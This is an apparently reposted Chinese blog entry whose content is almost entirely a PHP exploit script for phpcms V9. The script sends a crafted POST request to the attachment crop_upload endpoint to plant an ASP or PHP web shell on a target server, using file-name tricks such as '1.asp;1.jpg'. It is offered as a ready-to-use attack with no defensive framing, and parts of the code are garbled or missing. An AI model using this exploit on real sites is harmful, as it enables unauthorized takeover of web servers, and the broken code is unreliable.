phpcms V9 getshell exp

最新推荐文章于 2022-12-01 14:51:10 发布

7禧

最新推荐文章于 2022-12-01 14:51:10 发布

阅读量1.1k

点赞数

分类专栏：漏洞收集文章标签： phpcms V9

漏洞收集专栏收录该内容

207 篇文章 3 订阅

订阅专栏

转自法克
http://xx.f4ck.net/thread-5248-1-1.html

  
  #!usr/bin/php -w
';
$aspshell='<%eval request("'.$pass.'")%>';
 
if($js==1){
        $file="1.asp;1.jpg";
         $ret=GetShell
 
($url,$aspshell,$file);
        
}else if($js==2){
        $file="1.php;1.jpg";
        $ret=GetShell
 
($url,$phpshell,$file);
}else if($js==3){
        $file="1.php.jpg";
        $ret=GetShell($url,$phpshell,$file);
}else{
        print_r('没有选择脚本类型');
}
$pattern = "|http:\/\/[^,]+?\.jpg,?|U";
preg_match_all($pattern, 
 
$ret, $matches);
if($matches[0][0]){
        echo "\r\nurl地址:".$matches[0][0];
}else{
        echo "\r\n没得
 
到！";        
}
 
function GetShell($url,$shell,$js){
        $content =$shell;
        $data = "POST /index.php?
 
m=attachment&c=attachments&a=crop_upload&width=1&height=1&file=http://".$url."/uploadfile/".$js." HTTP/1.1\r\n"; 
  
 
      $data .= "Host: ".$url."\r\n";
        $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) 
 
Gecko/20100101 Firefox/5.0.1\r\n";
        $data .= "Accept: 
 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        $data .= "Accept-Language: zh-
 
cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
        $data .= "Connection: close\r\n";
        $data .= "Content-Length: 
 
".strlen($content)."\r\n\r\n";
        $data .= $content."\r\n";
        //echo $data;
        $ock=fsockopen
 
($url,80);
        if (!$ock) {
        echo "  No response from ".$url."\n";
        }
        fwrite
 
($ock,$data);
        $resp = '';
        while (!feof($ock)) {
                $resp.=fread($ock, 1024);
        
 
}
        return $resp;
}
 
 
?>